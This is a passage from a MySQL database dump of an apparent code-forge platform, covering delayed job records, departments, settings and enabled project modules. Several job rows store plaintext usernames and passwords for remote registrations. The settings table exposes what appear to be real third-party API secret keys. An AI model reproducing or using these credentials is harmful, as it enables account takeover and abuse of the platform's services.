16:47:58','2020-10-21 16:47:58'),(158,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-01 18:18:16',NULL,NULL,NULL,'default','2020-12-01 18:18:16','2020-12-01 18:18:16'),(159,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-02 13:18:32',NULL,NULL,NULL,'default','2020-12-02 13:18:32','2020-12-02 13:18:32'),(160,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-14 14:31:53',NULL,NULL,NULL,'default','2020-12-14 14:31:53','2020-12-14 14:31:53'),(161,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-16 16:06:31',NULL,NULL,NULL,'default','2020-12-16 16:06:31','2020-12-16 16:06:31'),(162,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-16 18:54:54',NULL,NULL,NULL,'default','2020-12-16 18:54:54','2020-12-16 18:54:54'),(163,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-17 10:03:56',NULL,NULL,NULL,'default','2020-12-17 10:03:56','2020-12-17 10:03:56'),(164,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-17 11:17:58',NULL,NULL,NULL,'default','2020-12-17 11:17:58','2020-12-17 11:17:58'),(165,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-17 11:22:00',NULL,NULL,NULL,'default','2020-12-17 11:22:00','2020-12-17 11:22:00'),(166,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p30579842\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2020-12-17 11:22:00',NULL,NULL,NULL,'default','2020-12-17 11:22:00','2020-12-17 11:22:00'),(167,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-18 18:53:33',NULL,NULL,NULL,'default','2020-12-18 18:53:33','2020-12-18 18:53:33'),(168,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p68193572\n :password: 2!6&G@MllHrx\n :email: \'\'\n :platform: military\n',NULL,'2020-12-18 18:53:33',NULL,NULL,NULL,'default','2020-12-18 18:53:33','2020-12-18 18:53:33'),(169,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-22 19:48:05',NULL,NULL,NULL,'default','2020-12-22 19:48:05','2020-12-22 19:48:05'),(170,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p62843970\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2020-12-22 19:48:05',NULL,NULL,NULL,'default','2020-12-22 19:48:05','2020-12-22 19:48:05'),(171,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-24 15:19:18',NULL,NULL,NULL,'default','2020-12-24 15:19:18','2020-12-24 15:19:18'),(172,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p15693087\n :password: a19960425\n :email: \'\'\n :platform: military\n',NULL,'2020-12-24 15:19:18',NULL,NULL,NULL,'default','2020-12-24 15:19:18','2020-12-24 15:19:18'),(173,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-27 11:43:54',NULL,NULL,NULL,'default','2020-12-27 11:43:54','2020-12-27 11:43:54'),(174,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p53467921\n :password: zj123456\n :email: \'\'\n :platform: military\n',NULL,'2020-12-27 11:43:54',NULL,NULL,NULL,'default','2020-12-27 11:43:54','2020-12-27 11:43:54'),(175,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-28 11:28:50',NULL,NULL,NULL,'default','2020-12-28 11:28:50','2020-12-28 11:28:50'),(176,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p68251479\n :password: zx1234565\n :email: \'\'\n :platform: military\n',NULL,'2020-12-28 11:28:50',NULL,NULL,NULL,'default','2020-12-28 11:28:50','2020-12-28 11:28:50'),(177,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-29 11:32:47',NULL,NULL,NULL,'default','2020-12-29 11:32:47','2020-12-29 11:32:47'),(178,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p80614752\n :password: caecc.casc\n :email: \'\'\n :platform: military\n',NULL,'2020-12-29 11:32:47',NULL,NULL,NULL,'default','2020-12-29 11:32:47','2020-12-29 11:32:47'),(179,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-29 15:12:24',NULL,NULL,NULL,'default','2020-12-29 15:12:24','2020-12-29 15:12:24'),(180,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p62091843\n :password: a19960425\n :email: \'\'\n :platform: military\n',NULL,'2020-12-29 15:12:24',NULL,NULL,NULL,'default','2020-12-29 15:12:24','2020-12-29 15:12:24'),(181,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-29 15:21:31',NULL,NULL,NULL,'default','2020-12-29 15:21:31','2020-12-29 15:21:31'),(182,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p86402359\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2020-12-29 15:21:32',NULL,NULL,NULL,'default','2020-12-29 15:21:32','2020-12-29 15:21:32'),(183,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-29 15:24:04',NULL,NULL,NULL,'default','2020-12-29 15:24:04','2020-12-29 15:24:04'),(184,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p21506749\n :password: caishi12345678\n :email: \'\'\n :platform: military\n',NULL,'2020-12-29 15:24:04',NULL,NULL,NULL,'default','2020-12-29 15:24:04','2020-12-29 15:24:04'),(185,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2020-12-30 10:05:30',NULL,NULL,NULL,'default','2020-12-30 10:05:30','2020-12-30 10:05:30'),(186,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p50629178\n :password: m1211834809\n :email: \'\'\n :platform: military\n',NULL,'2020-12-30 10:05:30',NULL,NULL,NULL,'default','2020-12-30 10:05:30','2020-12-30 10:05:30'),(187,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-05 10:33:26',NULL,NULL,NULL,'default','2021-01-05 10:33:26','2021-01-05 10:33:26'),(188,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p32465098\n :password: aa111111\n :email: \'\'\n :platform: military\n',NULL,'2021-01-05 10:33:26',NULL,NULL,NULL,'default','2021-01-05 10:33:26','2021-01-05 10:33:26'),(189,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-05 18:41:43',NULL,NULL,NULL,'default','2021-01-05 18:41:43','2021-01-05 18:41:43'),(190,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p92503478\n :password: 305542cb\n :email: \'\'\n :platform: military\n',NULL,'2021-01-05 18:41:43',NULL,NULL,NULL,'default','2021-01-05 18:41:43','2021-01-05 18:41:43'),(191,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 10:52:46',NULL,NULL,NULL,'default','2021-01-06 10:52:46','2021-01-06 10:52:46'),(192,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p16973248\n :password: a19960425\n :email: \'\'\n :platform: military\n',NULL,'2021-01-06 10:52:46',NULL,NULL,NULL,'default','2021-01-06 10:52:46','2021-01-06 10:52:46'),(193,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:04:59',NULL,NULL,NULL,'default','2021-01-06 11:04:59','2021-01-06 11:04:59'),(194,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p42807916\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2021-01-06 11:04:59',NULL,NULL,NULL,'default','2021-01-06 11:04:59','2021-01-06 11:04:59'),(195,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:12:28',NULL,NULL,NULL,'default','2021-01-06 11:12:28','2021-01-06 11:12:28'),(196,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p52869314\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2021-01-06 11:12:28',NULL,NULL,NULL,'default','2021-01-06 11:12:28','2021-01-06 11:12:28'),(197,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:21:36',NULL,NULL,NULL,'default','2021-01-06 11:21:36','2021-01-06 11:21:36'),(198,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p03254871\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2021-01-06 11:21:36',NULL,NULL,NULL,'default','2021-01-06 11:21:36','2021-01-06 11:21:36'),(199,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:29:05',NULL,NULL,NULL,'default','2021-01-06 11:29:05','2021-01-06 11:29:05'),(200,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p01685724\n :password: \'12345678\'\n :email: \'\'\n :platform: military\n',NULL,'2021-01-06 11:29:06',NULL,NULL,NULL,'default','2021-01-06 11:29:06','2021-01-06 11:29:06'),(201,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:39:56',NULL,NULL,NULL,'default','2021-01-06 11:39:56','2021-01-06 11:39:56'),(202,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p87463509\n :password: \'12345678\'\n :email: p87463509@example.net\n :platform: military\n',NULL,'2021-01-06 11:39:56',NULL,NULL,NULL,'default','2021-01-06 11:39:56','2021-01-06 11:39:56'),(203,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 11:47:58',NULL,NULL,NULL,'default','2021-01-06 11:47:58','2021-01-06 11:47:58'),(204,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p72350694\n :password: \'12345678\'\n :email: p72350694@example.org\n :platform: military\n',NULL,'2021-01-06 11:47:58',NULL,NULL,NULL,'default','2021-01-06 11:47:58','2021-01-06 11:47:58'),(205,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 14:02:22',NULL,NULL,NULL,'default','2021-01-06 14:02:22','2021-01-06 14:02:22'),(206,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p37154609\n :password: \'12345678\'\n :email: p37154609@example.org\n :platform: military\n',NULL,'2021-01-06 14:02:22',NULL,NULL,NULL,'default','2021-01-06 14:02:22','2021-01-06 14:02:22'),(207,0,0,'--- !ruby/object:SyncTrustieJob\ncount: 1\ntype: user\n',NULL,'2021-01-06 14:44:32',NULL,NULL,NULL,'default','2021-01-06 14:44:32','2021-01-06 14:44:32'),(208,0,0,'--- !ruby/object:SyncUserLoginJob\ntype: remote_register\nparams:\n :username: p92463871\n :password: \'12345678\'\n :email: p92463871@example.org\n :platform: military\n',NULL,'2021-01-06 14:44:32',NULL,NULL,NULL,'default','2021-01-06 14:44:32','2021-01-06 14:44:32');
|
||
/*!40000 ALTER TABLE `delayed_jobs` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `departments`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `departments`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `departments` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`school_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_auth` tinyint(1) DEFAULT '0',
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_departments_on_school_id` (`school_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `departments`
|
||
--
|
||
|
||
LOCK TABLES `departments` WRITE;
|
||
/*!40000 ALTER TABLE `departments` DISABLE KEYS */;
|
||
INSERT INTO `departments` VALUES (1,'国际贸易学院',11,'2018-07-08 10:29:41','2018-08-10 09:31:40',1),(2,'计算机',11,'2018-07-08 10:30:07','2018-07-08 10:30:07',0),(3,'计算机1',117,'2018-08-10 09:35:22','2018-08-10 09:35:22',0);
|
||
/*!40000 ALTER TABLE `departments` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `documents`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `documents`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `documents` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) NOT NULL DEFAULT '0',
|
||
`category_id` int(11) NOT NULL DEFAULT '0',
|
||
`title` varchar(60) NOT NULL DEFAULT '',
|
||
`description` text,
|
||
`created_on` datetime DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT '0',
|
||
`is_public` int(11) DEFAULT '1',
|
||
PRIMARY KEY (`id`),
|
||
KEY `documents_project_id` (`project_id`),
|
||
KEY `index_documents_on_category_id` (`category_id`),
|
||
KEY `index_documents_on_created_on` (`created_on`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `documents`
|
||
--
|
||
|
||
LOCK TABLES `documents` WRITE;
|
||
/*!40000 ALTER TABLE `documents` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `documents` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `dts`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `dts`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `dts` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`IPLineCode` varchar(255) DEFAULT NULL,
|
||
`Description` varchar(255) DEFAULT NULL,
|
||
`Num` varchar(255) DEFAULT NULL,
|
||
`Variable` varchar(255) DEFAULT NULL,
|
||
`TraceInfo` varchar(255) DEFAULT NULL,
|
||
`Method` varchar(255) DEFAULT NULL,
|
||
`File` varchar(255) DEFAULT NULL,
|
||
`IPLine` varchar(255) DEFAULT NULL,
|
||
`Review` varchar(255) DEFAULT NULL,
|
||
`Category` varchar(255) DEFAULT NULL,
|
||
`Defect` varchar(255) DEFAULT NULL,
|
||
`PreConditions` varchar(255) DEFAULT NULL,
|
||
`StartLine` varchar(255) DEFAULT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `dts`
|
||
--
|
||
|
||
LOCK TABLES `dts` WRITE;
|
||
/*!40000 ALTER TABLE `dts` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `dts` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `edu_settings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `edu_settings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `edu_settings` (
|
||
`id` bigint(20) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) DEFAULT NULL,
|
||
`value` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`description` varchar(255) DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
UNIQUE KEY `index_edu_settings_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `edu_settings`
|
||
--
|
||
|
||
LOCK TABLES `edu_settings` WRITE;
|
||
/*!40000 ALTER TABLE `edu_settings` DISABLE KEYS */;
|
||
INSERT INTO `edu_settings` VALUES (1,'host_name','https://forge.osredm.com','2020-08-10 04:05:26','2021-02-26 09:28:59',NULL),(2,'host_main_site','https://osredm.com/','2020-08-10 04:06:44','2021-02-26 09:30:00',NULL),(3,'attachment_folder','/files/','2020-08-17 01:45:28','2021-01-28 07:24:52',NULL),(4,'dun_text_api','http://as.dun.163.com/v3/text/check','2020-08-18 02:40:13','2020-08-18 02:40:13',NULL),(5,'dun_image_api','http://as.dun.163.com/v4/image/check','2020-08-18 02:41:36','2020-08-18 02:41:36',NULL),(6,'dun_secret_id','adcc647e99db87a726f72ae04c387a58','2020-08-18 02:41:53','2020-08-18 02:41:53',NULL),(7,'dun_secrect_key','26fe6db2db3db10e31aa376d62efbe03','2020-08-18 02:42:08','2020-08-18 02:42:08',NULL),(8,'dun_text_businessId','d4bf80426c2ef8c80167ea96dfe78da5','2020-08-18 02:42:23','2020-08-18 02:42:23',NULL),(9,'dun_image_businessId','4f3f02c85be03b29262aab363f2bccd3','2020-08-18 02:42:35','2020-08-18 02:42:35',NULL),(10,'cookie_domain','.osredm.com','2021-01-28 10:09:18','2021-03-02 09:57:42',NULL),(11,'sync_phenglei_user_project','477','2021-03-10 06:05:28','2021-03-10 06:05:28',NULL);
|
||
/*!40000 ALTER TABLE `edu_settings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `enabled_modules`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `enabled_modules`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `enabled_modules` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`name` varchar(255) NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `enabled_modules_project_id` (`project_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2763 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `enabled_modules`
|
||
--
|
||
|
||
LOCK TABLES `enabled_modules` WRITE;
|
||
/*!40000 ALTER TABLE `enabled_modules` DISABLE KEYS */;
|
||
INSERT INTO `enabled_modules` VALUES (242,25,'issue_tracking'),(243,25,'news'),(244,25,'files'),(245,25,'wiki'),(246,25,'repository'),(247,25,'boards'),(248,25,'calendar'),(249,25,'gantt'),(250,25,'course'),(251,25,'training_tasks'),(272,28,'issue_tracking'),(273,28,'news'),(274,28,'files'),(275,28,'wiki'),(276,28,'repository'),(277,28,'boards'),(278,28,'calendar'),(279,28,'gantt'),(280,28,'course'),(281,28,'training_tasks'),(282,29,'issue_tracking'),(283,29,'news'),(284,29,'files'),(285,29,'wiki'),(286,29,'repository'),(287,29,'boards'),(288,29,'calendar'),(289,29,'gantt'),(290,29,'course'),(291,29,'training_tasks'),(302,31,'issue_tracking'),(303,31,'news'),(304,31,'files'),(305,31,'wiki'),(306,31,'repository'),(307,31,'boards'),(308,31,'calendar'),(309,31,'gantt'),(310,31,'course'),(311,31,'training_tasks'),(312,32,'issue_tracking'),(313,32,'news'),(314,32,'files'),(315,32,'wiki'),(316,32,'repository'),(317,32,'boards'),(318,32,'calendar'),(319,32,'gantt'),(320,32,'course'),(321,32,'training_tasks'),(332,34,'issue_tracking'),(333,34,'news'),(334,34,'files'),(335,34,'wiki'),(336,34,'repository'),(337,34,'boards'),(338,34,'calendar'),(339,34,'gantt'),(340,34,'course'),(341,34,'training_tasks'),(372,38,'issue_tracking'),(373,38,'news'),(374,38,'files'),(375,38,'wiki'),(376,38,'repository'),(377,38,'boards'),(378,38,'calendar'),(379,38,'gantt'),(380,38,'course'),(381,38,'training_tasks'),(402,41,'issue_tracking'),(403,41,'news'),(404,41,'files'),(405,41,'wiki'),(406,41,'repository'),(407,41,'boards'),(408,41,'calendar'),(409,41,'gantt'),(410,41,'course'),(411,41,'training_tasks'),(412,42,'issue_tracking'),(413,42,'news'),(414,42,'files'),(415,42,'wiki'),(416,42,'repository'),(417,42,'boards'),(418,42,'calendar'),(419,42,'gantt'),(420,42,'course'),(421,42,'training_tasks'),(422,43,'issue_tracking'),(423,43,'news'),(424,43,'files'),(425,43,'wiki'),(426,43,'repository'),(427,43,'boards'),(428,43,'calendar'),(429,43,'gantt'),(430,43,'course'),(431,43,'training_tasks'),(532,54,'issue_tracking'),(533,54,'news'),(534,54,'files'),(535,54,'wiki'),(536,54,'repository'),(537,54,'boards'),(538,54,'calendar'),(539,54,'gantt'),(540,54,'course'),(541,54,'training_tasks'),(562,57,'issue_tracking'),(563,57,'news'),(564,57,'files'),(565,57,'wiki'),(566,57,'repository'),(567,57,'boards'),(568,57,'calendar'),(569,57,'gantt'),(570,57,'course'),(571,57,'training_tasks'),(572,58,'issue_tracking'),(573,58,'news'),(574,58,'files'),(575,58,'wiki'),(576,58,'repository'),(577,58,'boards'),(578,58,'calendar'),(579,58,'gantt'),(580,58,'course'),(581,58,'training_tasks'),(582,59,'issue_tracking'),(583,59,'news'),(584,59,'files'),(585,59,'wiki'),(586,59,'repository'),(587,59,'boards'),(588,59,'calendar'),(589,59,'gantt'),(590,59,'course'),(591,59,'training_tasks'),(592,60,'issue_tracking'),(593,60,'news'),(594,60,'files'),(595,60,'wiki'),(596,60,'repository'),(597,60,'boards'),(598,60,'calendar'),(599,60,'gantt'),(600,60,'course'),(601,60,'training_tasks'),(602,61,'issue_tracking'),(603,61,'news'),(604,61,'files'),(605,61,'wiki'),(606,61,'repository'),(607,61,'boards'),(608,61,'calendar'),(609,61,'gantt'),(610,61,'course'),(611,61,'training_tasks'),(612,62,'issue_tracking'),(613,62,'news'),(614,62,'files'),(615,62,'wiki'),(616,62,'repository'),(617,62,'boards'),(618,62,'calendar'),(619,62,'gantt'),(620,62,'course'),(621,62,'training_tasks'),(622,63,'issue_tracking'),(623,63,'news'),(624,63,'files'),(625,63,'wiki'),(626,63,'repository'),(627,63,'boards'),(628,63,'calendar'),(629,63,'gantt'),(630,63,'course'),(631,63,'training_tasks'),(632,64,'issue_tracking'),(633,64,'news'),(634,64,'files'),(635,64,'wiki'),(636,64,'repository'),(637,64,'boards'),(638,64,'calendar'),(639,64,'gantt'),(640,64,'course'),(641,64,'training_tasks'),(642,65,'issue_tracking'),(643,65,'news'),(644,65,'files'),(645,65,'wiki'),(646,65,'repository'),(647,65,'boards'),(648,65,'calendar'),(649,65,'gantt'),(650,65,'course'),(651,65,'training_tasks'),(652,66,'issue_tracking'),(653,66,'news'),(654,66,'files'),(655,66,'wiki'),(656,66,'repository'),(657,66,'boards'),(658,66,'calendar'),(659,66,'gantt'),(660,66,'course'),(661,66,'training_tasks'),(662,67,'issue_tracking'),(663,67,'news'),(664,67,'files'),(665,67,'wiki'),(666,67,'repository'),(667,67,'boards'),(668,67,'calendar'),(669,67,'gantt'),(670,67,'course'),(671,67,'training_tasks'),(682,69,'issue_tracking'),(683,69,'news'),(684,69,'files'),(685,69,'wiki'),(686,69,'repository'),(687,69,'boards'),(688,69,'calendar'),(689,69,'gantt'),(690,69,'course'),(691,69,'training_tasks'),(692,70,'issue_tracking'),(693,70,'news'),(694,70,'files'),(695,70,'wiki'),(696,70,'repository'),(697,70,'boards'),(698,70,'calendar'),(699,70,'gantt'),(700,70,'course'),(701,70,'training_tasks'),(722,73,'issue_tracking'),(723,73,'news'),(724,73,'files'),(725,73,'wiki'),(726,73,'repository'),(727,73,'boards'),(728,73,'calendar'),(729,73,'gantt'),(730,73,'course'),(731,73,'training_tasks'),(752,76,'issue_tracking'),(753,76,'news'),(754,76,'files'),(755,76,'wiki'),(756,76,'repository'),(757,76,'boards'),(758,76,'calendar'),(759,76,'gantt'),(760,76,'course'),(761,76,'training_tasks'),(772,78,'issue_tracking'),(773,78,'news'),(774,78,'files'),(775,78,'wiki'),(776,78,'repository'),(777,78,'boards'),(778,78,'calendar'),(779,78,'gantt'),(780,78,'course'),(781,78,'training_tasks'),(782,79,'issue_tracking'),(783,79,'news'),(784,79,'files'),(785,79,'wiki'),(786,79,'repository'),(787,79,'boards'),(788,79,'calendar'),(789,79,'gantt'),(790,79,'course'),(791,79,'training_tasks'),(792,80,'issue_tracking'),(793,80,'news'),(794,80,'files'),(795,80,'wiki'),(796,80,'repository'),(797,80,'boards'),(798,80,'calendar'),(799,80,'gantt'),(800,80,'course'),(801,80,'training_tasks'),(802,81,'issue_tracking'),(803,81,'news'),(804,81,'files'),(805,81,'wiki'),(806,81,'repository'),(807,81,'boards'),(808,81,'calendar'),(809,81,'gantt'),(810,81,'course'),(811,81,'training_tasks'),(812,82,'issue_tracking'),(813,82,'news'),(814,82,'files'),(815,82,'wiki'),(816,82,'repository'),(817,82,'boards'),(818,82,'calendar'),(819,82,'gantt'),(820,82,'course'),(821,82,'training_tasks'),(983,99,'issue_tracking'),(984,99,'news'),(985,99,'files'),(986,99,'wiki'),(987,99,'repository'),(988,99,'boards'),(989,99,'calendar'),(990,99,'gantt'),(991,99,'course'),(992,99,'training_tasks'),(993,100,'issue_tracking'),(994,100,'news'),(995,100,'files'),(996,100,'wiki'),(997,100,'repository'),(998,100,'boards'),(999,100,'calendar'),(1000,100,'gantt'),(1001,100,'course'),(1002,100,'training_tasks'),(1003,101,'issue_tracking'),(1005,101,'files'),(1007,101,'repository'),(1008,101,'boards'),(1013,102,'issue_tracking'),(1014,102,'news'),(1015,102,'files'),(1016,102,'wiki'),(1017,102,'repository'),(1018,102,'boards'),(1019,102,'calendar'),(1020,102,'gantt'),(1021,102,'course'),(1022,102,'training_tasks'),(1023,103,'issue_tracking'),(1024,103,'news'),(1025,103,'files'),(1026,103,'wiki'),(1027,103,'repository'),(1028,103,'boards'),(1029,103,'calendar'),(1030,103,'gantt'),(1031,103,'course'),(1032,103,'training_tasks'),(1194,120,'issue_tracking'),(1196,120,'files'),(1198,120,'repository'),(1199,120,'boards'),(1200,120,'calendar'),(1201,120,'gantt'),(1264,127,'issue_tracking'),(1265,127,'news'),(1266,127,'files'),(1267,127,'wiki'),(1268,127,'repository'),(1269,127,'boards'),(1270,127,'calendar'),(1271,127,'gantt'),(1272,127,'course'),(1273,127,'training_tasks'),(1284,129,'issue_tracking'),(1285,129,'news'),(1286,129,'files'),(1287,129,'wiki'),(1288,129,'repository'),(1289,129,'boards'),(1290,129,'calendar'),(1291,129,'gantt'),(1292,129,'course'),(1293,129,'training_tasks'),(1294,120,'code_review'),(1295,130,'issue_tracking'),(1296,130,'news'),(1297,130,'files'),(1298,130,'wiki'),(1299,130,'repository'),(1300,130,'boards'),(1301,130,'calendar'),(1302,130,'gantt'),(1303,130,'course'),(1304,130,'training_tasks'),(1305,131,'issue_tracking'),(1306,131,'news'),(1307,131,'files'),(1308,131,'wiki'),(1309,131,'repository'),(1310,131,'boards'),(1311,131,'calendar'),(1312,131,'gantt'),(1313,131,'course'),(1314,131,'training_tasks'),(1315,132,'issue_tracking'),(1316,132,'news'),(1317,132,'files'),(1318,132,'wiki'),(1319,132,'repository'),(1320,132,'boards'),(1321,132,'calendar'),(1322,132,'gantt'),(1323,132,'course'),(1324,132,'training_tasks'),(1365,137,'issue_tracking'),(1366,137,'news'),(1367,137,'files'),(1368,137,'wiki'),(1369,137,'repository'),(1370,137,'boards'),(1371,137,'calendar'),(1372,137,'gantt'),(1373,137,'course'),(1374,137,'training_tasks'),(1385,139,'issue_tracking'),(1386,139,'news'),(1387,139,'files'),(1388,139,'wiki'),(1389,139,'repository'),(1390,139,'boards'),(1391,139,'calendar'),(1392,139,'gantt'),(1393,139,'course'),(1394,139,'training_tasks'),(1395,140,'issue_tracking'),(1396,140,'news'),(1397,140,'files'),(1398,140,'wiki'),(1399,140,'repository'),(1400,140,'boards'),(1401,140,'calendar'),(1402,140,'gantt'),(1403,140,'course'),(1404,140,'training_tasks'),(1405,141,'issue_tracking'),(1406,141,'news'),(1407,141,'files'),(1408,141,'wiki'),(1409,141,'repository'),(1410,141,'boards'),(1411,141,'calendar'),(1412,141,'gantt'),(1413,141,'course'),(1414,141,'training_tasks'),(1425,143,'issue_tracking'),(1426,143,'news'),(1427,143,'files'),(1428,143,'wiki'),(1429,143,'repository'),(1430,143,'boards'),(1431,143,'calendar'),(1432,143,'gantt'),(1433,143,'course'),(1434,143,'training_ta